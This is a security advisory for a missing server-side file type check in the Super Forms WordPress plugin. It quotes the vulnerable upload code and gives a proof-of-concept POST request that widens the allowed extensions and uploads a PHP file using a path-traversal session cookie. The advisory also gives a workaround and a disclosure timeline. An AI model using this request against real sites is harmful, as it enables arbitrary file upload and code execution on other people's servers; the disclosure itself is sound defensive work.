usd-2019-0003 | feeling4design Super Forms – Drag & Drop Form Builder/1.6.1 – 4.4.8


Advisory ID: usd-2019-0003
CVE Number: N/A
Affected Product: Super Forms
Affected Version: 1.6.1 – 4.4.8
Vulnerability Type: Missing Server Side File Type Validation
Security Risk: Medium
Vendor URL: https://github.com/feeling4design
Vendor Status: Fixed (Version 4.5.3)
Note: We could still exploit the vulnerability

Description

Due to the lack of validation on the server side, an attacker can add an arbitrary file extension and upload arbitrary files accordingly. This vulnerability when combined with the vulnerability „Path Traversal in File Upload via PHPSESSID Cookie“ described in usd-2019-0002 can lead to Remote Code Execution.

Proof of Concept

The upload of arbitrary file extension was tested on a customers instance of wordpress + super forms.

Steps to reproduce:
– Setup wordpress with super forms and create a form containing an upload form
– Before submitting this form, add the intended file extension to accept_file_types

The acceptable file types are part of the http request. By default, it is like ‚jpg|jpeg|
png|gif|pdf|PDF|JPG|JPEG|PNG|GIF‘, but we were able to add PHP or .* in this field.
The related php in file uploads/php/index.php:

if( (!isset($_REQUEST['max_file_size'])) || (!
isset($_REQUEST['accept_file_types'])) ) {
exit;
}

error_reporting(E_ALL | E_STRICT);
require('UploadHandler.php');
$max_file_size = $_REQUEST['max_file_size'];
$accept_file_types = $_REQUEST['accept_file_types'];
$strip = array('php', 'phtml', 'php3', 'php5', 'phps', 'shtml', 'asa', 'cer');

foreach($strip as $v){
$accept_file_types = str_replace($v,'', $accept_file_types);
}

$upload_handler = new UploadHandler(array(
'accept_file_types' => '/\.(' . $accept_file_types . ')$/i',
'max_file_size' => $max_file_size
));

To upload the usd.php we used the following HTTP POST request:
Please note the added „PHP|.*“

POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
Host: XXXXXXXXXXX
[...]
Content-Type: multipart/form-data; boundary=---------------------------100830798400009382880005694
Cookie: [some cookies] PHPSESSID=../
Connection: close
-----------------------------100830798400009382880005694
Content-Disposition: form-data; name="accept_file_types"
jpg|jpeg|png|gif|pdf|PDF|JPG|JPEG|PNG|GIF|TXT|PHP|.*
-----------------------------100830798400009382880005694
Content-Disposition: form-data; name="max_file_size"
8000000
-----------------------------100830798400009382880005694
Content-Disposition: form-data; name="files[]"; filename="usd.php"
Content-Type: text/plain
<?php echo "Dies ist ein Pentest!"; ?>
-----------------------------100830798400009382880005694--

Fix

Disclaimer
The suggested fix is just a temporary workaround and not a final fix that ensures the full security of this wordpress plugin. It is intended to support the developers to close this vulnerability.

The vulnerabilities we found are not yet fixed by the latest version of this plugin. One option is to turn it off.

Another option is to apply the following temporary fixes:
In /uploads/php/index.php do not assign $max_file_size and $accept_file_types from user input $_REQUEST[‚accept_file_types‘] to limit the allowed file extensions to the intended. For Example, fetch both values from a configuration file instead from user input.

Timeline

  • 2019-01-25 First Contact request via contact form to: https://codecanyon.net/item/super-forms-drag-drop-form-builder/13979866/support
  • 2019-02-05 Vendor releases version 4.5.3 with a supposed fix. We could still exploit the vulnerability. (related: Changelog on https://codecanyon.net/item/super-forms-drag-drop-form-builder/13979866)
  • 2019-07-31 Security advisory released

Credits

This security vulnerabilities were found by Tim Kranz and Matthias Göhring of usd AG.